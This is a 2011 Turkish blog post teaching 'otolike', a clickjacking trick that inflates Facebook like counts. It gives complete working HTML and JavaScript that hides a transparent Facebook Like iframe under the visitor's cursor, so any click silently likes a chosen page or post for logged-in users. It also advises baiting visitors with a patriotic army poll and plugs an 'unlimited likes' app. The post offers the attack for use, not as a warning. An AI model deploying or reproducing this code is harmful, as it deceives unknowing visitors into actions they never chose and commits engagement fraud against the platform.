28

Ağustos
2011

Facebook’ta Beğeni Sayılarınız Tavan Yapsın

Yazar: Jaisuss  |  Kategori: Webmaster  |  Yorum: 3  |  Tıklanma : 220866

cross grey small Facebookta Beğeni Sayılarınız Tavan YapsınBu yazı 4 yıl 3 ay 5 gün önce yayınlanmış olduğundan güncelliğini yitirmiş veya içeriğindeki bilgilerin geçerliliği kaybolmuş olabilir. Herhangi bir yanlış anlaşılmadan bu site sorumlu değildir.

Merhaba arkadaşlar. Öncelikle az sonra anlatmaya başlayacağım şeylerin ne işe yarayacağını açıklayarak Facebook’ta Beğeni Sayılarınız Tavan Yapsın adlı makaleme başlıyorum :). Bu sistem, taktik, hile -artık ne derseniz- ile sayfalarınızı, durumlarınızı, fotoğraflarınızı feysbukta aklınıza gelen her beğenilmesini istediğiniz olayları yüksek beğeni sayılarına ulaştırabilirsiniz. Millete beğen diye yalvarmadan kuul bi profil elde edebileceksiniz.

Duymuşsunuzdur belki otolike‘ ı. Otolike Beğen butonunun imlecin önüne iframe atarak gizlenmesine dayalı bir sistemdir. Otolike bulunan internet sayfalarında nereye tıklarsanız tıklayın eğer giriş yapmışsanız facebooka haberiniz olmadan bir durumu, fotoğrafı, bağlantıyı yada bi sayfayı beğenmiş oluyorsunuz. Bi çok arkadaş bu yolla sayfalarının beğeni sayılarını artırmakta.

Eğer yüksek beğenilere ulaşmak istiyorsanız hedefimiz insanlara tıklattırmaktır. İnsanların zaaflarını kullanara bunu başarabilirsiniz. Bunu yapan çoğu arkadaş olaya erotizmden giriyor fakat bana göre bu pek etkili değil ve büyük bi kitleye sahip değil. Daha genel bi şey olmalı, insanların tıklamaktan kaçınmayacağı bi durum olmalı. Hazırlamış olduğum örnek sayfayı inceleyelim..

20110828172950capture Facebookta Beğeni Sayılarınız Tavan Yapsın

İnsanların tıklamaktan çekinmeyeği bi durum bu. Vatanı. Önemini tartışmayacağım durum ortada. Biraz ciddiyet hiç fena olmaz. Ciddi tasarımlar insanlara güven verir ve yaptıları işin havaya olmadığı duygusunu kazandırır. O yüzden yukarıdaki sayfada İngilizce kelimeler kullandım. İnsanlara Türk Ordusu mu Amerilan Ordusumu daha güvenilir seçimini yaptırmak istedim. Türk ortamlarında paylaşağım için doğal olarak Turkey seçeneğini seçmek isteyecekler. Eğer bi sayfaya sahipseniz ve şu şekilde paylaşırsanız en yüksek beğeni kitlesine ulaşıcağınızı umuyorum.

adszoqk Facebookta Beğeni Sayılarınız Tavan Yapsın

Otolike için hazırlayacağınız sayfaya yerleştirmeniz gerek kod bu.

<script type=”text/javascript” src=”http://ajax.googleapis.com/ajax/libs/jquery/1.5/jquery.min.js”></script> </head> <body> <div style=”cursor: default ! important; overflow: hidden; width: 5px; height: 12px; position: absolute; opacity: 0; z-index: 9999; left: 538px; top: 322px;” id=”i”><iframe src=”http://www.facebook.com/plugins/like.php?href=BEĞENİLECEKLİNK&layout=standard&show_faces=true&width=450&action=like&font&colorscheme=light&height=80″ scrolling=”no” frameborder=”0″ style=”border:none; overflow:hidden; width:450px; height:80px;” allowTransparency=”true”></iframe><script> var c = document.getElementById(‘i’); function s(e){ if(document.all)e = event; c.style.left = e.clientX – 4; c.style.top = e.clientY – 5; return false; } document.documentElement.onmousemove = s; window.onload=setTimeout(“i.style.display = ‘none’”,60000); </script></div>

Kırmızı renkle belirttiğim yere beğenilmesini istediğiniz link gelecel. Eğer bi sayfanızın beğenilmesini istiyorsanız sayfanızıın linkini yapıştırıyorsunuz bu kolay. Ama eğer bi paylaşımımınızın beğenilmesini istiyorsanız linkini paylaşımın paylaşıldığı saate basarak elde edebilirsiniz.

adszzlp Facebookta Beğeni Sayılarınız Tavan Yapsın

Bu sistemi gerçekleştirebilmek için öncelikle bi hostunuz olmak zorunda. Ücretsiz bi host kolaylıkla elde edebilirsiniz. Eğer anlamam ben hazırladığım dosyayı hosta atamam derseniz yorumda belirtin ben size yardımcı olurum.

Tüm bunları yaptıktan sonra tek yapmanız gereken oluşturduğunuz sayfayı paylaşmak. Oda sizin hünerinize kalmış bi şey :).

Bu yöntem durum beğenisi yapmak isteyenler için uğraşmaya değmez arkadaşlar. Onun yerine tek bi tıkla durumlarınızı binlerce kişiye beğendirebileceğiniz aşağıdaki uygulamaları kullanın

Facebook Sınırsız Beğeni Uygulaması

yorumlar:

3 Yorum Yapılmış!

  Kadir özkurt

  Haz 15, 2012

  - * Eğer sevdiğin seni seviyorsa, Ne olursa olsun bırakıp da gitmez .# ♥ .- *

  Cevapla

  tarkan demirtaş

  Tem 16, 2012

  beykozlular buraya

  Cevapla

  beşirgürsoy

  Tem 22, 2012

  dünyadaki en güzel şeyi sana vermek isterdim ama seni sana veremem

  Cevapla

Bir yorum yapsan süper olur :)

Facebook RSS Beslemesi
sponsor reklamlar

© Tüm Haklarım Saklı değildir -
Fakat siz öyleymiş gibi davranınız.

jaisus, jusiass, jasius, jai, jaisuz, Kürşat Karayılan
Giriş Sitemap alexa bilgilerim